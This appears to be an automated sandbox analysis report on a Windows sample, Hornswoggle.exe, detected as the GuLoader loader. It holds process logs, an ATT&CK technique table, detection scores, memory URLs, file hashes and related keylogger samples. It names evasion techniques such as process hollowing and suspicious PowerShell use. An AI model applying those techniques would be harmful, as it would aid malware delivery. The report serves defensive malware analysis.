    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
    ATT&CK tactics and techniques (numbers in parentheses are the matrix's per-technique counts):
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: Windows Management Instrumentation (1); Shared Modules (1); PowerShell (1); Cron; Launchd; Scheduled Task
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: Access Token Manipulation (1); Process Injection (111); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: Masquerading (1); Access Token Manipulation (1); Process Injection (111); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: Security Software Discovery (1); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (14); Wi-Fi Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
    Behavior Graph (ID: 1583356; Sample: Hornswoggle.exe; Start date: 02/01/2025; Architecture: WINDOWS; Score: 76)

    • Sample-level signatures: Multi AV Scanner detection for submitted file; Yara detected GuLoader; Machine Learning detection for sample
    • Hornswoggle.exe (started): dropped C:\Users\user\AppData\...\Udateret90.Lis (Unicode) and C:\Users\user\AppData\Local\...\nsExec.dll (PE32); signature: Suspicious powershell command line found; started powershell.exe
    • powershell.exe: Sample uses process hollowing technique; Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module; started conhost.exe, msiexec.exe, msiexec.exe and 36 other processes

    Source | Detection | Scanner | Label
    Hornswoggle.exe | 50% | ReversingLabs | Win32.Ransomware.GuLoader
    Hornswoggle.exe | 72% | Virustotal |
    Hornswoggle.exe | 100% | Joe Sandbox ML |
    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll | 0% | ReversingLabs |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://pesterbdd.com/images/Pester.png4 | 0% | Avira URL Cloud | safe
    http://crl.microso | 0% | Avira URL Cloud | safe
    http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe
    http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe
    No contacted domains info
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://pesterbdd.com/images/Pester.png4 | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://github.com/Pester/Pester4 | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://nsis.sf.net/NSIS_Error | Hornswoggle.exe | false | Avira URL Cloud: safe | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.microso | powershell.exe, 00000002.00000002.23278768511.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/ | powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/License | powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/Icon | powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.quovadis.bm0 | powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://nsis.sf.net/NSIS_ErrorError | Hornswoggle.exe | false | Avira URL Cloud: safe | unknown
    https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0.html4 | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    No contacted IP infos
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1583356
                                    Start date and time:2025-01-02 14:44:13 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 13m 54s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:42
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Hornswoggle.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@4409/14@0/0
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 121
                                    • Number of non-executed functions: 22
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Execution Graph export aborted for target powershell.exe, PID 6400 because it is empty
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                    Time | Type | Description
                                    08:48:19 | API Interceptor | 1364x Sleep call for process: powershell.exe modified
                                    No context
                                    No context
                                    No context
                                    No context
                                    Match: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll
                                    Associated Sample Name / URL | Detection | Threat Name
                                    Overheaped237.exe | malicious | GuLoader, Snake Keylogger
                                    66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
                                    anziOUzZJs.exe | malicious | Remcos
                                    SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe | malicious | Unknown
                                    PTFE Coated Butterfly Valve Picture#U00b7pdf.exe | malicious | GuLoader, Lokibot
                                    cuenta iban-ES65.exe | malicious | FormBook, GuLoader
                                    cuenta iban-ES65.exe | malicious | GuLoader
                                    cuenta iban-ES65.exe | malicious | FormBook, GuLoader
                                    cuenta iban-ES65.exe | malicious | GuLoader
                                                      Process:C:\Users\user\Desktop\Hornswoggle.exe
                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                      Category:dropped
                                                      Size (bytes):784
                                                      Entropy (8bit):3.3154839523635506
                                                      Encrypted:false
                                                      SSDEEP:12:8wl0BsXUCjRXUkl1klx0IMJGc3IrR6/rNJkKAh4t2YCBTo8:8S5R1EwrFIrRC5HALJT
                                                      MD5:DC2A6AA9AAEA41EDA059F4C9E0423988
                                                      SHA1:7F4E86846CEA864566922E65BF977DB9D2530CA4
                                                      SHA-256:91D8DC4269F38DC49985735B7DE872C058CD16E891CAE3BDA119B82FF8B1A282
                                                      SHA-512:2F80CB8CB8F5E7348B7336307DB4E3BFEA2414314EDE3997BD76FC9F7B3DEE18F78EEDA3FA685B3D603B7BC57A1D84A1645BEC35391D09FA28B07751766E8859
                                                      Malicious:false
